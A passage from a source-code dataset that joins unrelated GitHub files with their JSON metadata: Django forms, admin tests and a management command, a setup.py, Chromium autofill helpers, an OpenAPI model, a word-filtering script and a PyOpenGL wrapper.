"bytes": "438017"
},
{
"name": "Python",
"bytes": "9186415"
},
{
"name": "Shell",
"bytes": "3855"
}
],
"symlink_target": ""
} |
from .cli import main
main() | {
"content_hash": "2abe3982d3558a845ef8bfa26ca357cd",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 21,
"avg_line_length": 9.666666666666666,
"alnum_prop": 0.7241379310344828,
"repo_name": "avanov/solo",
"id": "c49f9df415fcc05442d953e006fd17c1c03432de",
"size": "29",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "solo/__main__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "273"
},
{
"name": "Mako",
"bytes": "494"
},
{
"name": "Python",
"bytes": "162984"
},
{
"name": "RAML",
"bytes": "903"
}
],
"symlink_target": ""
} |
from django import forms
from backend.models import Praise
class PraiseForm(forms.ModelForm):
class Meta:
#provides an association between the model form and a model
model = Praise
exclude = ['user']
| {
"content_hash": "400e584abd9f9efb8a61ecbb426eec22",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 61,
"avg_line_length": 26,
"alnum_prop": 0.7644230769230769,
"repo_name": "SEACodeCarrots/PraiseReminder",
"id": "48b57f131e160d17d0ec5449991a7903ba9b55f9",
"size": "259",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "reviver/backend/forms.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "3931"
},
{
"name": "HTML",
"bytes": "6213"
},
{
"name": "JavaScript",
"bytes": "366"
},
{
"name": "Python",
"bytes": "11038"
}
],
"symlink_target": ""
} |
"""
A setuptools file for the pyworkout-toolkit
"""
from setuptools import setup, find_packages
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='pyworkout-toolkit',
version='0.0.22',
description='Python tools to process workout data and telemetry',
long_description=long_description,
url='https://github.com/triskadecaepyon/pyworkout-toolkit/',
maintainer='David Liu',
maintainer_email='[email protected]',
license='BSD',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Topic :: Scientific/Engineering',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
'Operating System :: Microsoft :: Windows',
'Operating System :: POSIX',
'Operating System :: Unix',
'Operating System :: MacOS',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
],
keywords='workout data telemetry',
packages=find_packages(exclude=['contrib', 'docs', 'tests']),
install_requires=['numpy', 'pandas', 'lxml'],
)
| {
"content_hash": "55f93417430c1e512b60808732e6da62",
"timestamp": "",
"source": "github",
"line_count": 51,
"max_line_length": 69,
"avg_line_length": 27.098039215686274,
"alnum_prop": 0.6316931982633864,
"repo_name": "triskadecaepyon/pyworkout-toolkit",
"id": "14ae4e5cf3946b388874d7c5feef346c5948ddd7",
"size": "1405",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "36"
},
{
"name": "Python",
"bytes": "7753"
},
{
"name": "Shell",
"bytes": "35"
}
],
"symlink_target": ""
} |
class UnknownColumnNameException(Exception):
"""Exception type raised when encountering an unknown column name."""
def __init__(self, column_name):
self.column_name = column_name
def __str__(self):
return repr(self.column_name)
def SerializeProfiles(profiles):
"""Returns a serialized string for the given |profiles|.
|profiles| should be a list of (field_type, value) string pairs.
"""
lines = []
for profile in profiles:
# Include a fixed string to separate profiles.
lines.append("---")
for (field_type, value) in profile:
if field_type == "ignored":
continue;
lines.append("%s:%s%s" % (field_type, (' ' if value else ''), value))
return '\n'.join(lines)
def ColumnNameToFieldType(column_name):
"""Converts the given |column_name| to the corresponding AutofillField type.
|column_name| should be a string drawn from the column names of the
autofill_profiles table in the Chromium "Web Data" database.
"""
column_name = column_name.lower()
field_type = "unknown"
if column_name in ["guid", "label", "country", "date_modified", "origin",
"language_code", "use_count", "use_date", "sorting_code",
"dependent_locality"]:
field_type = "ignored"
elif column_name == "first_name":
field_type = "NAME_FIRST"
elif column_name == "middle_name":
field_type = "NAME_MIDDLE"
elif column_name == "last_name":
field_type = "NAME_LAST"
elif column_name == "full_name":
field_type = "NAME_FULL"
elif column_name == "email":
field_type = "EMAIL_ADDRESS"
elif column_name == "company_name":
field_type = "COMPANY_NAME"
elif column_name == "address_line_1":
field_type = "ADDRESS_HOME_LINE1"
elif column_name == "address_line_2":
field_type = "ADDRESS_HOME_LINE2"
elif column_name == "street_address":
field_type = "ADDRESS_HOME_STREET_ADDRESS"
elif column_name == "city":
field_type = "ADDRESS_HOME_CITY"
elif column_name == "state":
field_type = "ADDRESS_HOME_STATE"
elif column_name == "zipcode":
field_type = "ADDRESS_HOME_ZIP"
elif column_name == "country_code":
field_type = "ADDRESS_HOME_COUNTRY"
elif column_name == "phone":
field_type = "PHONE_HOME_WHOLE_NUMBER"
else:
raise UnknownColumnNameException(column_name)
return field_type
| {
"content_hash": "e4580ee1d8f74dc1300767a059e15961",
"timestamp": "",
"source": "github",
"line_count": 74,
"max_line_length": 78,
"avg_line_length": 31.324324324324323,
"alnum_prop": 0.6591889559965487,
"repo_name": "chromium/chromium",
"id": "94eeca6cb4051d9f81df14b64afcbfdde9eb8ca6",
"size": "2460",
"binary": false,
"copies": "7",
"ref": "refs/heads/main",
"path": "components/test/data/autofill/merge/tools/autofill_merge_common.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
} |
from django.core.management.base import BaseCommand
from directory.models import Researches, ParaclinicInputGroups, ParaclinicInputField
import json
from appconf.manager import SettingManager
class Command(BaseCommand):
def add_arguments(self, parser):
parser.add_argument('research_pk', type=int)
def handle(self, *args, **kwargs):
research_pk = kwargs["research_pk"]
research_data = {}
r = Researches.objects.get(pk=research_pk)
research_data['title'] = r.title
research_data['code'] = r.code
research_data['short_title'] = r.short_title
groups = ParaclinicInputGroups.objects.filter(research=r)
groups_to_save = []
for group in groups:
fields_in_group = []
for f in ParaclinicInputField.objects.filter(group=group, hide=False):
field_data = {
'title': f.title,
'short_title': f.short_title,
'order': f.order,
'default_value': f.default_value,
'lines': f.lines,
'field_type': f.field_type,
'for_extract_card': f.for_extract_card,
'for_talon': f.for_talon,
'helper': f.helper,
'input_templates': f.input_templates,
'required': f.required,
'hide': f.hide,
}
fields_in_group.append(field_data)
groups_to_save.append(
{
'title': group.title,
'show_title': group.show_title,
'order': group.order,
'hide': group.hide,
'paraclinic_input_field': fields_in_group,
'fieldsInline': group.fields_inline,
}
)
research_data['paraclinic_input_groups'] = groups_to_save
dir_tmp = SettingManager.get("dir_param")
with open(f'{dir_tmp}/{research_pk}.json', 'w') as fp:
json.dump(research_data, fp)
| {
"content_hash": "d1a5908d04ff2f8a5a13d3b0a7487c72",
"timestamp": "",
"source": "github",
"line_count": 51,
"max_line_length": 84,
"avg_line_length": 41.11764705882353,
"alnum_prop": 0.5231282784930854,
"repo_name": "moodpulse/l2",
"id": "15825919a3d6c517fbe54669655b43bee1c6d562",
"size": "2097",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "users/management/commands/export_research.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "38747"
},
{
"name": "Dockerfile",
"bytes": "146"
},
{
"name": "HTML",
"bytes": "238498"
},
{
"name": "JavaScript",
"bytes": "425946"
},
{
"name": "Makefile",
"bytes": "1515"
},
{
"name": "Python",
"bytes": "3710422"
},
{
"name": "SCSS",
"bytes": "48493"
},
{
"name": "Shell",
"bytes": "1815"
},
{
"name": "TypeScript",
"bytes": "98237"
},
{
"name": "Vue",
"bytes": "1980612"
}
],
"symlink_target": ""
} |
"""
Qc API
Qc API # noqa: E501
The version of the OpenAPI document: 3.0.0
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from telestream_cloud_qc.configuration import Configuration
class SingleColorTest(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'max_time_allowed': 'float',
'time_secs_or_frames': 'SecsOrFramesType',
'percentage_of_frame': 'float',
'ignore_below': 'int',
'reject_on_error': 'bool',
'checked': 'bool'
}
attribute_map = {
'max_time_allowed': 'max_time_allowed',
'time_secs_or_frames': 'time_secs_or_frames',
'percentage_of_frame': 'percentage_of_frame',
'ignore_below': 'ignore_below',
'reject_on_error': 'reject_on_error',
'checked': 'checked'
}
def __init__(self, max_time_allowed=None, time_secs_or_frames=None, percentage_of_frame=None, ignore_below=None, reject_on_error=None, checked=None, local_vars_configuration=None): # noqa: E501
"""SingleColorTest - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._max_time_allowed = None
self._time_secs_or_frames = None
self._percentage_of_frame = None
self._ignore_below = None
self._reject_on_error = None
self._checked = None
self.discriminator = None
if max_time_allowed is not None:
self.max_time_allowed = max_time_allowed
if time_secs_or_frames is not None:
self.time_secs_or_frames = time_secs_or_frames
if percentage_of_frame is not None:
self.percentage_of_frame = percentage_of_frame
if ignore_below is not None:
self.ignore_below = ignore_below
if reject_on_error is not None:
self.reject_on_error = reject_on_error
if checked is not None:
self.checked = checked
@property
def max_time_allowed(self):
"""Gets the max_time_allowed of this SingleColorTest. # noqa: E501
:return: The max_time_allowed of this SingleColorTest. # noqa: E501
:rtype: float
"""
return self._max_time_allowed
@max_time_allowed.setter
def max_time_allowed(self, max_time_allowed):
"""Sets the max_time_allowed of this SingleColorTest.
:param max_time_allowed: The max_time_allowed of this SingleColorTest. # noqa: E501
:type: float
"""
self._max_time_allowed = max_time_allowed
@property
def time_secs_or_frames(self):
"""Gets the time_secs_or_frames of this SingleColorTest. # noqa: E501
:return: The time_secs_or_frames of this SingleColorTest. # noqa: E501
:rtype: SecsOrFramesType
"""
return self._time_secs_or_frames
@time_secs_or_frames.setter
def time_secs_or_frames(self, time_secs_or_frames):
"""Sets the time_secs_or_frames of this SingleColorTest.
:param time_secs_or_frames: The time_secs_or_frames of this SingleColorTest. # noqa: E501
:type: SecsOrFramesType
"""
self._time_secs_or_frames = time_secs_or_frames
@property
def percentage_of_frame(self):
"""Gets the percentage_of_frame of this SingleColorTest. # noqa: E501
:return: The percentage_of_frame of this SingleColorTest. # noqa: E501
:rtype: float
"""
return self._percentage_of_frame
@percentage_of_frame.setter
def percentage_of_frame(self, percentage_of_frame):
"""Sets the percentage_of_frame of this SingleColorTest.
:param percentage_of_frame: The percentage_of_frame of this SingleColorTest. # noqa: E501
:type: float
"""
self._percentage_of_frame = percentage_of_frame
@property
def ignore_below(self):
"""Gets the ignore_below of this SingleColorTest. # noqa: E501
:return: The ignore_below of this SingleColorTest. # noqa: E501
:rtype: int
"""
return self._ignore_below
@ignore_below.setter
def ignore_below(self, ignore_below):
"""Sets the ignore_below of this SingleColorTest.
:param ignore_below: The ignore_below of this SingleColorTest. # noqa: E501
:type: int
"""
self._ignore_below = ignore_below
@property
def reject_on_error(self):
"""Gets the reject_on_error of this SingleColorTest. # noqa: E501
:return: The reject_on_error of this SingleColorTest. # noqa: E501
:rtype: bool
"""
return self._reject_on_error
@reject_on_error.setter
def reject_on_error(self, reject_on_error):
"""Sets the reject_on_error of this SingleColorTest.
:param reject_on_error: The reject_on_error of this SingleColorTest. # noqa: E501
:type: bool
"""
self._reject_on_error = reject_on_error
@property
def checked(self):
"""Gets the checked of this SingleColorTest. # noqa: E501
:return: The checked of this SingleColorTest. # noqa: E501
:rtype: bool
"""
return self._checked
@checked.setter
def checked(self, checked):
"""Sets the checked of this SingleColorTest.
:param checked: The checked of this SingleColorTest. # noqa: E501
:type: bool
"""
self._checked = checked
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, SingleColorTest):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, SingleColorTest):
return True
return self.to_dict() != other.to_dict()
| {
"content_hash": "b4f43ab084e392459bb2e0469f2b0c98",
"timestamp": "",
"source": "github",
"line_count": 249,
"max_line_length": 198,
"avg_line_length": 30.076305220883533,
"alnum_prop": 0.5908666043530512,
"repo_name": "Telestream/telestream-cloud-python-sdk",
"id": "8ca88d9bc6c36a04e0cbb047ef8c435aa7067f4e",
"size": "7506",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "telestream_cloud_qc_sdk/telestream_cloud_qc/models/single_color_test.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1339719"
},
{
"name": "Shell",
"bytes": "6712"
}
],
"symlink_target": ""
} |
"""
Eric Nordstrom
Python 3.6.0
4/29/17
Removes out-of-vocabulary (OOV) words, a.k.a. "mixed words", from the provided series of
tokens. Words are deemed OOV when they are not found in either provided language dictionary.
Results are stored in .TXT file(s) specified by the user. PyDictionary option available for
English dictionary (requires PyDictionary module and reliable internet connection).
Example command line input:
C:\Users\Me\Research\Files>..\Scripts\OOVs.py "Tokenized Corpus.txt" SpnDict . -d1 utf8
Interpretation:
..\Scripts\OOVs.py Call OOVs.py from separate directory
"Tokenized Corpus.txt" Corpus tokens data (quotes to avoid parsing argument)
SpnDict Spanish dictionary (".txt" assumed)
. PyDictionary option chosen for English dictionary
-d1 Spanish dictionary encoding type argument called
utf8 Spanish dictionary encoding type specification
"""
def PyDict(): #for default D2 argument in OOV_remove
'''Returns PyDictionary object'''
from PyDictionary import PyDictionary
return PyDictionary()
def OOV_remove( tokens, D1, D2=PyDict() ):
'''Removes OOVs from tokens list based on two dictionaries. PyDictionary module used for Dictionary 2 default.'''
import string
if type( D2 ) in { set, list, tuple, dict }:
def condition3( word, D2 ): #condition for IF statement in FOR loop
return word not in D2
else: #assume PyDictionary
def condition3( word, D2 ):
return D2.meaning( word ) == None #This line would print to the console on each OOV if the STDOUT were not changed.
import sys, os
orig_stdout = sys.stdout #to save for later
sys.stdout = open( os.devnull, 'w' ) #prevents printing to console during PyDictionary usage
t = list( tokens ) #to become output tokens LIST with OOVs removed
OOVs = {} #to become DICT containing removed OOVs hashed with their original indices in TOKENS
d = 0 #index offset to account for already removed OOV words
for i in range( 0, len(tokens) ):
word = tokens[i]
if word not in string.punctuation and word not in D1 and condition3( word, D2 ):
OOVs.update({ i+1 : word }) #can remove "+1" after "i" on this line if zero-indexing desired.
del t[i-d]
d += 1
if type( D2 ) not in { set, list, tuple, dict }:
sys.stdout = orig_stdout #restore stdout
return ( t, OOVs )
def gettxt( file_name, encoding_type=None ):
'''Reads and splits .TXT files. Appends ".txt" to file name if necessary.'''
name = file_name
if name[-4:] != ".txt":
name += ".txt"
return open( name, encoding=encoding_type ).read().split() #LIST type
def get_answer(prompt, accepted_answers, answer_type = str):
'''Loops until input is an accepted answer'''
answer = 'a;sdlkfha;oiwefhdnfaf;we'
while answer not in accepted_answers:
answer = answer_type( input( prompt ) )
if answer.lower() not in accepted_answers:
print( '"%s" is not an accepted response.' % str( answer ) )
return answer
def destwrite( words, help_message ):
'''User interface for writing to .TXT files. Does not return anything.'''
destname = input( '\nInput destination .TXT file name ("\\H" for help): ' )
h = True
if destname.lower() == "\\h":
print( help_message )
destname = input( "\nInput destination .TXT file name: " )
h = False
option = 'n'
sep = False #used for "append" case
while option in { 'c', 'n' }: #determine how to open file
if destname[-4:] != ".txt":
destname += ".txt"
try: #User should preferably type a file name that does not already exist, in which case this block is not necessary.
dest = open( destname, 'r' )
print( "\nFile by that name already exists." )
prompt = 'Options:\n\t"O" - overwrite contents\n\t"A" - append to contents\n\t"C" - create new file with "(1)" appended to name\n\t"N" - enter new name\n\t[ctrl]+[C] - exit\n\nInput: '
accepted_answers = { 'o', 'a', 'c', 'n', '\h' }
option = get_answer( prompt, accepted_answers ).lower()
if option == 'o':
print( '\nOverwriting "%s".' % destname )
dest = open( destname, 'w' )
elif option == 'a':
print( '\nAppending to "%s".' % destname )
dest = open( destname, 'a' )
sep = True
elif option == 'c':
destname = destname[:-4] + " (1)"
elif option == 'n':
destname = input( "\nInput destination .TXT file name%s: " % ( ' ("\\H" for help)' * h ) )
else:
print( help_message )
destname = input( "\nInput destination .TXT file name: " )
h = False
except FileNotFoundError: #Preferred block
option = '' #to exit WHILE loop
print( '\nCreating and writing to new file "%s".' % destname )
dest = open( destname, 'w' )
dest.write( "\n"*9*sep ) #for "append" case
for i in words:
dest.write( str( i ) )
if type( words ) == dict: #OOVs
dest.write( " : " + words[i] )
dest.write( "\n" )
dest.close()
print( "Writing complete. File saved." )
def main():
import argparse
parser = argparse.ArgumentParser( description = 'Locate, remove, and record out-of-vocabulary (OOV) words, a.k.a. "mixed words"' )
parser.add_argument( "TOKENS", help="Name of the .TXT file containing corpus tokens." )
parser.add_argument( "D1", help="Name of the language 1 dictionary .TXT file" )
parser.add_argument( "D2", help='Name of the language 2 dictionary .TXT file. Enter "." for PyDictionary (requires PyDictionary module and reliable internet connection). NOTE: PyDictionary only for English; English dictionary must be D2 if using PyDictionary.' )
parser.add_argument( "-t", "--TOKENS_encoding", help="Tokens .TXT file encoding type. Default used if not specified." )
parser.add_argument( "-d1", "--D1_encoding", help="Language 1 dictionary .TXT file encoding type. Default used if not specified." )
parser.add_argument( "-d2", "--D2_encoding", help="Language 2 dictionary .TXT file encoding type. Default used if not specified." )
parser.add_argument( "-cd", "--change_directory", help='Change the folder in which to locate .TXT files. NOTE: It is also possible to specify individual file locations by including the entire path starting from "C:\".' )
args = parser.parse_args()
if args.change_directory:
import os
os.chdir( args.change_directory )
tokens = gettxt( args.TOKENS, args.TOKENS_encoding )
D1 = gettxt( args.D1, args.D1_encoding )
if args.D2 == ".":
if args.D2_encoding:
raise RuntimeError( "Both PyDictionary option and encoding type specified for D2." )
D2 = PyDict()
else:
D2 = gettxt( args.D2, args.D2_encoding )
print( "\nRemoving OOVs...\n" )
( tokens_without_OOVs, OOVs ) = OOV_remove( tokens, D1, D2 )
print( "\nOOVs removed.\n" )
help_message = '\nDestination .TXT file used to store tokens list after removing out-of-vocabulary (OOV) words, a.k.a. "mixed words". If destination file to be outside of current working directory, include file location path in name.'
destwrite( tokens_without_OOVs, help_message )
prompt = "\nWrite removed OOVs to .TXT file? (Y/N): "
accepted_answers = { 'y', 'n' }
keep_OOVs = get_answer( prompt, accepted_answers )
if keep_OOVs.lower() == 'y':
help_message = '\nDestination .TXT file used to store removed out-of-vocabulary (OOV) words, a.k.a. "mixed words", and their corresponding locations in the original tokens list. If destination file to be outside of current working directory, include file location path in name.'
destwrite( OOVs, help_message )
print( "\nDone." )
if __name__ == "__main__":
main()
| {
"content_hash": "443e1ad2e72256310ace21e4e22cabc7",
"timestamp": "",
"source": "github",
"line_count": 209,
"max_line_length": 286,
"avg_line_length": 41.066985645933016,
"alnum_prop": 0.5922171734824654,
"repo_name": "Bilingual-Annotation-Task-Force/Scripts",
"id": "0f05ac4aee78642de6dc339d6bc6572d905c7761",
"size": "8583",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "OOVs.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "22258"
},
{
"name": "Python",
"bytes": "102724"
},
{
"name": "R",
"bytes": "10423"
},
{
"name": "Shell",
"bytes": "4817"
}
],
"symlink_target": ""
} |
'''OpenGL extension APPLE.framebuffer_multisample
This module customises the behaviour of the
OpenGL.raw.GLES1.APPLE.framebuffer_multisample to provide a more
Python-friendly API
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/APPLE/framebuffer_multisample.txt
'''
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES1 import _types, _glgets
from OpenGL.raw.GLES1.APPLE.framebuffer_multisample import *
from OpenGL.raw.GLES1.APPLE.framebuffer_multisample import _EXTENSION_NAME
def glInitFramebufferMultisampleAPPLE():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION | {
"content_hash": "f155ec6b5702d39deed13058a172338c",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 74,
"avg_line_length": 36.26086956521739,
"alnum_prop": 0.8105515587529976,
"repo_name": "alexus37/AugmentedRealityChess",
"id": "459873a85b542cb934628a46b18b956f6579b86a",
"size": "834",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "pythonAnimations/pyOpenGLChess/engineDirectory/oglc-env/lib/python2.7/site-packages/OpenGL/GLES1/APPLE/framebuffer_multisample.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "158062"
},
{
"name": "C++",
"bytes": "267993"
},
{
"name": "CMake",
"bytes": "11319"
},
{
"name": "Fortran",
"bytes": "3707"
},
{
"name": "Makefile",
"bytes": "14618"
},
{
"name": "Python",
"bytes": "12813086"
},
{
"name": "Roff",
"bytes": "3310"
},
{
"name": "Shell",
"bytes": "3855"
}
],
"symlink_target": ""
} |
import json
import datetime
from djangocms_text_ckeditor.cms_plugins import TextPlugin
from djangocms_text_ckeditor.models import Text
from django.contrib import admin
from django.contrib.admin.models import LogEntry
from django.contrib.admin.sites import site, AdminSite
from django.contrib.auth import get_user_model
from django.contrib.auth.models import Permission, AnonymousUser
from django.contrib.sites.models import Site
from django.core.urlresolvers import reverse
from django.http import (Http404, HttpResponseBadRequest, HttpResponseForbidden, HttpResponse,
QueryDict, HttpResponseNotFound)
from django.utils.encoding import force_text, smart_str
from django.utils import timezone
from django.utils.six.moves.urllib.parse import urlparse
from cms.admin.change_list import CMSChangeList
from cms.admin.forms import PageForm, AdvancedSettingsForm
from cms.admin.pageadmin import PageAdmin
from cms.admin.permissionadmin import PagePermissionInlineAdmin
from cms import api
from cms.api import create_page, create_title, add_plugin, assign_user_to_page, publish_page
from cms.constants import PLUGIN_MOVE_ACTION
from cms.models import UserSettings, StaticPlaceholder
from cms.models.pagemodel import Page
from cms.models.permissionmodels import GlobalPagePermission, PagePermission
from cms.models.placeholdermodel import Placeholder
from cms.models.pluginmodel import CMSPlugin
from cms.models.titlemodels import Title
from cms.test_utils import testcases as base
from cms.test_utils.testcases import (
CMSTestCase, URL_CMS_PAGE_DELETE, URL_CMS_PAGE,URL_CMS_TRANSLATION_DELETE,
URL_CMS_PAGE_CHANGE_LANGUAGE, URL_CMS_PAGE_CHANGE, URL_CMS_PAGE_PERMISSIONS,
URL_CMS_PAGE_ADD, URL_CMS_PAGE_PUBLISHED
)
from cms.test_utils.util.fuzzy_int import FuzzyInt
from cms.utils import get_cms_setting
from cms.utils.i18n import force_language
from cms.utils.urlutils import admin_reverse
class AdminTestsBase(CMSTestCase):
@property
def admin_class(self):
return site._registry[Page]
def _get_guys(self, admin_only=False, use_global_permissions=True):
admin_user = self.get_superuser()
if admin_only:
return admin_user
USERNAME = 'test'
if get_user_model().USERNAME_FIELD == 'email':
normal_guy = get_user_model().objects.create_user(USERNAME, '[email protected]', '[email protected]')
else:
normal_guy = get_user_model().objects.create_user(USERNAME, '[email protected]', USERNAME)
normal_guy.is_staff = True
normal_guy.is_active = True
normal_guy.save()
normal_guy.user_permissions = Permission.objects.filter(
codename__in=['change_page', 'change_title', 'add_page', 'add_title', 'delete_page', 'delete_title']
)
if use_global_permissions:
gpp = GlobalPagePermission.objects.create(
user=normal_guy,
can_change=True,
can_delete=True,
can_change_advanced_settings=False,
can_publish=True,
can_change_permissions=False,
can_move_page=True,
)
gpp.sites = Site.objects.all()
return admin_user, normal_guy
class AdminTestCase(AdminTestsBase):
def test_extension_not_in_admin(self):
admin_user, staff = self._get_guys()
with self.login_user_context(admin_user):
request = self.get_request(URL_CMS_PAGE_CHANGE % 1, 'en',)
response = site.index(request)
self.assertNotContains(response, '/mytitleextension/')
self.assertNotContains(response, '/mypageextension/')
def test_permissioned_page_list(self):
"""
Makes sure that a user with restricted page permissions can view
the page list.
"""
admin_user, normal_guy = self._get_guys(use_global_permissions=False)
current_site = Site.objects.get(pk=1)
page = create_page("Test page", "nav_playground.html", "en",
site=current_site, created_by=admin_user)
PagePermission.objects.create(page=page, user=normal_guy)
with self.login_user_context(normal_guy):
resp = self.client.get(URL_CMS_PAGE)
self.assertEqual(resp.status_code, 200)
def test_edit_does_not_reset_page_adv_fields(self):
"""
Makes sure that if a non-superuser with no rights to edit advanced page
fields edits a page, those advanced fields are not touched.
"""
OLD_PAGE_NAME = 'Test Page'
NEW_PAGE_NAME = 'Test page 2'
REVERSE_ID = 'Test'
OVERRIDE_URL = 'my/override/url'
admin_user, normal_guy = self._get_guys()
current_site = Site.objects.get(pk=1)
# The admin creates the page
page = create_page(OLD_PAGE_NAME, "nav_playground.html", "en",
site=current_site, created_by=admin_user)
page.reverse_id = REVERSE_ID
page.save()
title = page.get_title_obj()
title.has_url_overwrite = True
title.path = OVERRIDE_URL
title.save()
self.assertEqual(page.get_title(), OLD_PAGE_NAME)
self.assertEqual(page.reverse_id, REVERSE_ID)
self.assertEqual(title.overwrite_url, OVERRIDE_URL)
# The user edits the page (change the page name for ex.)
page_data = {
'title': NEW_PAGE_NAME,
'slug': page.get_slug(),
'language': title.language,
'site': page.site.pk,
'template': page.template,
'pagepermission_set-TOTAL_FORMS': 0,
'pagepermission_set-INITIAL_FORMS': 0,
'pagepermission_set-MAX_NUM_FORMS': 0,
'pagepermission_set-2-TOTAL_FORMS': 0,
'pagepermission_set-2-INITIAL_FORMS': 0,
'pagepermission_set-2-MAX_NUM_FORMS': 0
}
# required only if user haves can_change_permission
with self.login_user_context(normal_guy):
resp = self.client.post(base.URL_CMS_PAGE_CHANGE % page.pk, page_data,
follow=True)
self.assertEqual(resp.status_code, 200)
self.assertTemplateNotUsed(resp, 'admin/login.html')
page = Page.objects.get(pk=page.pk)
self.assertEqual(page.get_title(), NEW_PAGE_NAME)
self.assertEqual(page.reverse_id, REVERSE_ID)
title = page.get_title_obj()
self.assertEqual(title.overwrite_url, OVERRIDE_URL)
# The admin edits the page (change the page name for ex.)
page_data = {
'title': OLD_PAGE_NAME,
'slug': page.get_slug(),
'language': title.language,
'site': page.site.pk,
'template': page.template,
'reverse_id': page.reverse_id,
'pagepermission_set-TOTAL_FORMS': 0, # required only if user haves can_change_permission
'pagepermission_set-INITIAL_FORMS': 0,
'pagepermission_set-MAX_NUM_FORMS': 0,
'pagepermission_set-2-TOTAL_FORMS': 0,
'pagepermission_set-2-INITIAL_FORMS': 0,
'pagepermission_set-2-MAX_NUM_FORMS': 0
}
with self.login_user_context(admin_user):
resp = self.client.post(base.URL_CMS_PAGE_CHANGE % page.pk, page_data,
follow=True)
self.assertEqual(resp.status_code, 200)
self.assertTemplateNotUsed(resp, 'admin/login.html')
page = Page.objects.get(pk=page.pk)
self.assertEqual(page.get_title(), OLD_PAGE_NAME)
self.assertEqual(page.reverse_id, REVERSE_ID)
title = page.get_title_obj()
self.assertEqual(title.overwrite_url, OVERRIDE_URL)
def test_edit_does_not_reset_apphook(self):
"""
Makes sure that if a non-superuser with no rights to edit advanced page
fields edits a page, those advanced fields are not touched.
"""
OLD_PAGE_NAME = 'Test Page'
NEW_PAGE_NAME = 'Test page 2'
REVERSE_ID = 'Test'
APPLICATION_URLS = 'project.sampleapp.urls'
admin_user, normal_guy = self._get_guys()
current_site = Site.objects.get(pk=1)
# The admin creates the page
page = create_page(OLD_PAGE_NAME, "nav_playground.html", "en",
site=current_site, created_by=admin_user)
page.reverse_id = REVERSE_ID
page.save()
title = page.get_title_obj()
title.has_url_overwrite = True
title.save()
page.application_urls = APPLICATION_URLS
page.save()
self.assertEqual(page.get_title(), OLD_PAGE_NAME)
self.assertEqual(page.reverse_id, REVERSE_ID)
self.assertEqual(page.application_urls, APPLICATION_URLS)
# The user edits the page (change the page name for ex.)
page_data = {
'title': NEW_PAGE_NAME,
'slug': page.get_slug(),
'language': title.language,
'site': page.site.pk,
'template': page.template,
'pagepermission_set-TOTAL_FORMS': 0,
'pagepermission_set-INITIAL_FORMS': 0,
'pagepermission_set-MAX_NUM_FORMS': 0,
'pagepermission_set-2-TOTAL_FORMS': 0,
'pagepermission_set-2-INITIAL_FORMS': 0,
'pagepermission_set-2-MAX_NUM_FORMS': 0,
}
with self.login_user_context(normal_guy):
resp = self.client.post(base.URL_CMS_PAGE_CHANGE % page.pk, page_data,
follow=True)
self.assertEqual(resp.status_code, 200)
self.assertTemplateNotUsed(resp, 'admin/login.html')
page = Page.objects.get(pk=page.pk)
self.assertEqual(page.get_title(), NEW_PAGE_NAME)
self.assertEqual(page.reverse_id, REVERSE_ID)
self.assertEqual(page.application_urls, APPLICATION_URLS)
title = page.get_title_obj()
# The admin edits the page (change the page name for ex.)
page_data = {
'title': OLD_PAGE_NAME,
'slug': page.get_slug(),
'language': title.language,
'site': page.site.pk,
'template': page.template,
'reverse_id': page.reverse_id,
}
with self.login_user_context(admin_user):
